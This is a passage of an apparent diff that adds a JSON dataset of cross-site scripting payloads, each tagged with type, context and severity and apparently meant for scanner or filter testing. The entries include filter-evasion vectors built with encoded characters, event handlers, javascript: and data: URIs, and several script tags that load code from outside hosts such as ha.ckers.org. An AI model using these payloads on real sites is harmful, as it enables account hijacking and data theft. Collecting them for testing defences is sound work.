"xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"jav&#65ascript:javascript:alert(2517)\">test1</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"jav&#97ascript:javascript:alert(2440)\">test1</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<embed width=500 height=500 code=\"data:text/html,<script>%(payload)s</script>\"></embed>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe srcdoc=\"&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(8195)&amp;gt;>\">", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "'';!--\"<XSS>=&{()}", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=\"javascript:alert(1034);\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=javascript:alert(3195)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=JaVaScRiPt:alert(9924)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=javascript:alert(1140)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=`javascript:alert(\"RSnake says, 8481\")`>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a onmouseover=\"alert(3111)\">xxs link</a>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a onmouseover=alert(2114)>xxs link</a>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG \"\"\"><SCRIPT>alert(4432)</SCRIPT>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=# onmouseover=\"alert('xxs')\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC= onmouseover=\"alert('xxs')\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG onmouseover=\"alert('xxs')\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=\"jav\tascript:alert(5461);\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=\"jav&#x09;ascript:alert(7333);\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=\"jav&#x0A;ascript:alert(3310);\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=\"jav&#x0D;ascript:alert(1111);\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > out", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=\" &#14; javascript:alert(9113);\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(4444)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<<SCRIPT>alert(1110);//<</SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<SCRIPT SRC=//ha.ckers.org/.j>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=\"javascript:alert(4392)\"", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe src=http://ha.ckers.org/scriptlet.html <", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "\\\";alert(9492);//", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "</TITLE><SCRIPT>alert(2005);</SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert(1231);\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<BODY BACKGROUND=\"javascript:alert(3482)\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG DYNSRC=\"javascript:alert(3999)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG LOWSRC=\"javascript:alert(9921)\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<STYLE>li {list-style-image: url(\"javascript:alert(7774)\");}</STYLE><UL><LI>XSS</br>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC='vbscript:msgbox(1134)'>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=\"livescript:[code]\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<BODY ONLOAD=alert(8839)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "xss\"><!--><svg/onload=alert(document.domain)>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<BGSOUND SRC=\"javascript:alert(5993);\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<BR SIZE=\"&{alert(9194)}\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<LINK REL=\"stylesheet\" HREF=\"javascript:alert(8461);\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(4421)';</STYLE>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG STYLE=\"xss:expr/*XSS*/ession(alert(8012))\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "style", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "exp/*<A STYLE='no\\xss:noxss(\"*//*\");xss:ex/*XSS*//*/*/pression(alert(1010))'>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<STYLE TYPE=\"text/javascript\">alert(3901);</STYLE>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<STYLE>.XSS{background-image:url(\"javascript:alert(3280)\");}</STYLE><A CLASS=XSS></A>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert(8001)\")}</STYLE>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert(8013)\")}</STYLE>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<XSS STYLE=\"xss:expression(alert(8840))\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<XSS STYLE=\"behavior: url(xss.htc);\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "¼script¾alert(¢XSS¢)¼/script¾", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(5202);\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "event_attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(7710);\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IFRAME SRC=\"javascript:alert(8401);\"></IFRAME>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IFRAME SRC=# onmouseover=\"alert(4431)\"></IFRAME>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<FRAMESET><FRAME SRC=\"javascript:alert(8041);\"></FRAMESET>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<TABLE BACKGROUND=\"javascript:alert(3412)\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<TABLE><TD BACKGROUND=\"javascript:alert(1302)\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<DIV STYLE=\"background-image: url(javascript:alert(4201))\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\">", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<DIV STYLE=\"background-image: url(&#1;javascript:alert(6481))\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<DIV STYLE=\"width: expression(alert(1355));\">", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<BASE HREF=\"javascript:alert(5002);//\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<? echo('<SCR)';echo('IPT>alert(1011)</SCRIPT>'); ?>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert(8041)</SCRIPT>\">", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert(9411);+ADw-/SCRIPT+AD4-", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<A HREF=\"http://66.102.7.147/\">XSS</A>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<A HREF=\"http://1113982867/\">XSS</A>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<A HREF=\"htt\tp://6\t6.000146.0x7.147/\">XSS</A>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe %00 src=\"&Tab;javascript:prompt(8103)&Tab;\"%00>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "style", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<input/onmouseover=\"javaSCRIPT&colon;confirm&lpar;1&rpar;\"", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<sVg><scRipt %00>alert&lpar;1&rpar; {Opera}", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img/src=`%00` onerror=this.onerror=confirm(1)", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<form><isindex formaction=\"javascript&colon;confirm(1)\"", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src=`%00`&NewLine; onerror=alert(7928)&NewLine;", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<ScRipT 5-0*3+9/3=>prompt(2296)</ScRipT giveanswerhere=?", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe/src=\"data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script /*%00*/>/*%00*/alert(8053)/*%00*/</script /*%00*/", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "&#34;&#62;<h1/onmouseover='\\u0061lert(1)'>%00", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe/src=\"data:text/html,<svg &#111;&#110;load=alert(5412)>\">", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<meta content=\"&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(2609)\" http-equiv=\"refresh\"/>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<meta http-equiv=\"refresh\" content=\"0;url=javascript:confirm(1)\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<form><a href=\"javascript:\\u0061lert&#x28;1&#x29;\">X", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "</script><img/*%00/src=\"worksinchrome&colon;prompt&#x28;1440&#x29;\"/%00*/onerror='eval(src)'>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img/&#09;&#10;&#11; src=`~` onerror=prompt(4464)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<form><iframe &#09;&#10;&#11; src=\"javascript&#58;alert(8045)\"&#11;&#10;&#09;;>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"&#09;&#10;&#11;>X</a", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "http://www.google<script .com>alert(document.location)</script", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a&#32;href&#61;&#91;&#00;&#93;\"&#00; onmouseover=prompt&#40;9421&#41;&#47;&#47;\">XYZ</a", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img/src=@&#32;&#13; onerror = prompt('&#49&#49&#49&#49;')", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "style", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script ^__^>alert(String.fromCharCode(49))</script ^__^", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "&#00;</form><input type&#61;\"date\" onfocus=\"alert(6317)\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<form><textarea &#13; onkeyup='\\u0061\\u006C\\u0065\\u0072\\u0074&#x28;1&#x29;'>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script /***/>/***/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')/***/</script /***/", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe srcdoc='&lt;body onload=prompt&lpar;1411&rpar;&gt;'>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "event_attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<a href=\"javascript:void(0)\" onmouseover=&NewLine;javascript:alert(0449)&NewLine;>X</a>", + "category": "xss", + "metadata": { + "type": 